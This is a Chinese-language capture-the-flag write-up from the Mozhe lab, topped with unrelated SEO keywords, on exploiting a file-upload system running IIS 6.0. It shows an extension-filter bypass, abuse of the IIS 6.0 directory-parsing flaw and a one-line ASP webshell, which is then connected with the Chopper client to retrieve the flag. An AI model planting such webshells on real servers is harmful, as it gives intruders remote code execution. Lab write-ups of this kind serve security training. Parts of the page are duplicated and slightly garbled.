太原网站建,北京网页设计电脑培训,网站统计哪个好用,二级域名做网站有哪些缺点墨者——内部文件上传系统漏洞分析溯源 内部文件上传系统漏洞分析溯源
1.选择合适的文件上传 2.可以看到为*.asp文件 3.可以推测出此站点为IIS 4.上传shell.asp试试 5.上传报错#xff0c;将其改名为shell.asp.txt上传#xff0c;发现上传成功 6.有个问题就是服务器将我们所…墨者——内部文件上传系统漏洞分析溯源 内部文件上传系统漏洞分析溯源
1.选择合适的文件上传 2.可以看到为*.asp文件 3.可以推测出此站点为IIS 4.上传shell.asp试试 5.上传报错将其改名为shell.asp.txt上传发现上传成功 6.有个问题就是服务器将我们所上传的文件进行了重命名故我们应该想办法截断 7.经过测试发现不行那么查看一下操作系统的版本Microsoft-IIS/6.0
8.看看此服务器有没有什么漏洞发现此版本有文件解析漏洞 9.把文档中的内容替换成一句话木马
%eval request(“test”)%10.上传试试 11.改上传的路径为123.asp,那么此目录下的所有文件就会被当做asp执行 12.接下来使用菜刀连接 13.找到flag
KEY:mozhe8d9d6022cc9ac37e39936699415PS:使用菜刀连接一开始我还以为马儿有问题有点坑
